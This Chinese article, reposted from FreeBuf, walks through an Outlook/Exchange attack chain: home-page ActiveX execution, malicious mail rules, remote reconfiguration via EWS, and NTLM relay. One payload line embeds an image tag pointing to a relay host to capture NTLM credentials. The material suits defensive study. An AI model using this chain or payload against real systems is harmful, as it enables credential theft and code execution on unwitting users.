一、Outlook主页滥用

OUTLOOK可以设置主页样式,如下图为收件夹的主页样式

1586247257_5e8c36593ed2f.png!small

只要打开OUTLOOK就会立即执行,最主要的是可以该主页可以调用outlook的内部IE浏览器,Outlook的内部IE浏览器可以执ACTIVEX,从而执行可执行程序。最骚的是即使在outlook设置中禁用了ACTIVEX,也不影响内部IE浏览器的ACTIVEX。

如:a.html,创建一个wscript.shell,执行notepad。代码详情见

https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/

1586247281_5e8c36716afad.png!small

只要重新启动OUTLOOK即可直接执行。

1586247298_5e8c36825bea5.png!small

二、OUTLOOK的规则滥用(远程唤起)

主页滥用每次重启OUTLOOK都会执行恶意脚本,这样在某些特殊情况下可能会动静太大。这里利用outlook的规则制定,打开管理规则和通知,点击新建规则

1586247323_5e8c369b1eca6.png!small

新建空白规则,点击下一步

1586247343_5e8c36af65992.png!small

通过自己的需求,设置制定规则,如收到包含fuck为主题的邮件就弹出计算器。

1586247363_5e8c36c3253ad.png!small

通过这样就可以远程唤醒恶意脚本了。

三、exchange ews

Exchange ews接口支持NTLM认证,从而进行收发件,配置邮箱等操作,当然也可以配置上文的主页和规则,这样我们只要拿到NTLM凭证就可以操控本地用户的outlook的配置,从而执行恶意程序。

四、NTLM中继

要想快速拿到NTLM凭证,最快的方式就是dump密码和hash中继。既然outlook存在低版本的内置ie浏览器这边选hash中继。

五、域内用户相互信任机制

在域内内部组织成员互相发送邮件是能够加载JS的,只要在邮件正文插入JS,如<IMG SRC=\\IP(NTLM中继地址)>,这样倒叙往上推就可以拿下任何人的当前权限了。

从步骤5,4,3,2/1就可以形成攻击链了

1586247397_5e8c36e5628fd.png!small

1.用户触发XSS,向中继服务器进行认证

2.中继服务器劫持认证,并通过exchange ews接口更改本地配置

3.EWS发送同步指令,更新本地用户OUTLOOK配置,从而命令执行

防御策略:关闭不必要的API接口并更新最新补丁。

本文作者:꧁, 转自FreeBuf